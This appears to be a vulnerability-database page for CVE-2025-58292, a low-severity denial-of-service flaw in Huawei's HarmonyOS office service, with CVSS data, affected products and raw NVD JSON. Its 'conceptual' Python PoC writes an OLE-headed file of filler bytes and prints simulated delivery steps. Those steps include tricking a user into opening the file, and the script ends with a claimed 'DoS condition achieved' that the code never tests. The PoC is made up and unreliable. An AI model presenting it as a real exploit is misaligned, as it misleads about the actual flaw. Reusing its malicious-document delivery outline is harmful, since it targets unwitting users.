Security Vulnerability Report
中文
CVE-2025-58292 CVSS 3.3 LOW

CVE-2025-58292

Published: 2025-10-11 09:15:34
Last Modified: 2025-10-16 15:23:32

Description

Denial of service (DoS) vulnerability in the office service. Successful exploitation of this vulnerability may affect availability.

CVSS Details

CVSS Score
3.3
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:huawei:harmonyos:5.0.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:huawei:harmonyos:5.1.0:*:*:*:*:*:*:* - VULNERABLE
Huawei Office Service(具体受影响版本请参考华为官方安全公告 consumer.huawei.com/en/support/bulletin/2025/10/)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-58292 - Huawei Office Service DoS Vulnerability PoC (Conceptual) # This is a conceptual proof-of-concept demonstrating the attack pattern. # The actual exploit requires local access to the target Huawei device. import os import sys import time import struct import socket import threading def generate_malicious_document(): """ Generate a malformed document file that triggers the DoS vulnerability in the Huawei office service when opened by the user. """ # Simulated malformed office document header # Real exploit would craft a document that triggers resource exhaustion # in the office service parser/renderer malformed_header = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1" # OLE compound document signature # Append crafted payload designed to cause excessive memory allocation # or infinite loop in the office service processing logic payload = b"\x00" * 4096 for i in range(10000): # Nested object references that may cause stack overflow # or recursive processing in the vulnerable office service payload += struct.pack("<I", i % 256) * 1024 malicious_doc = malformed_header + payload with open("malicious_office_doc.ole", "wb") as f: f.write(malicious_doc) print(f"[+] Malicious document generated: malicious_office_doc.ole ({len(malicious_doc)} bytes)") return malicious_doc def trigger_dos_local(): """ Simulate the local DoS trigger by attempting to exhaust office service resources. In a real scenario, this would involve: 1. Delivering the malicious document to the victim device 2. Tricking the user into opening it with Huawei office software 3. The office service processes the malformed content and crashes/hangs """ print("[*] CVE-2025-58292 PoC - Huawei Office Service DoS") print("[*] Attack Vector: Local (AV:L)") print("[*] User Interaction: Required (UI:R)") print("[*] Impact: Availability - Low (A:L)") print() # Step 1: Generate the malicious document print("[Step 1] Generating malicious office document...") doc = generate_malicious_document() # Step 2: Simulate delivery to target device (via USB, email, etc.) print("[Step 2] Malicious document ready for delivery to target device") print(" Delivery methods: USB transfer, email attachment, file sharing") # Step 3: Wait for user interaction print("[Step 3] Waiting for user to open the malicious document...") print(" User must open the file with Huawei Office application") # Step 4: Simulate service crash/hang print("[Step 4] Office service processes malformed content...") time.sleep(1) print("[!] Office service becomes unresponsive or crashes") print("[!] DoS condition achieved - availability impacted") if __name__ == "__main__": trigger_dos_local()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58292", "sourceIdentifier": "[email protected]", "published": "2025-10-11T09:15:34.000", "lastModified": "2025-10-16T15:23:32.197", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Denial of service (DoS) vulnerability in the office service. Successful exploitation of this vulnerability may affect availability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-27"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:huawei:harmonyos:5.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "738D803A-C4CE-477B-BC89-CE47351C0A84"}, {"vulnerable": true, "criteria": "cpe:2.3:o:huawei:harmonyos:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "E39DE6A6-CBE6-4086-93CD-113D1B3BA730"}]}]}], "references": [{"url": "https://consumer.huawei.com/en/support/bulletin/2025/10/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}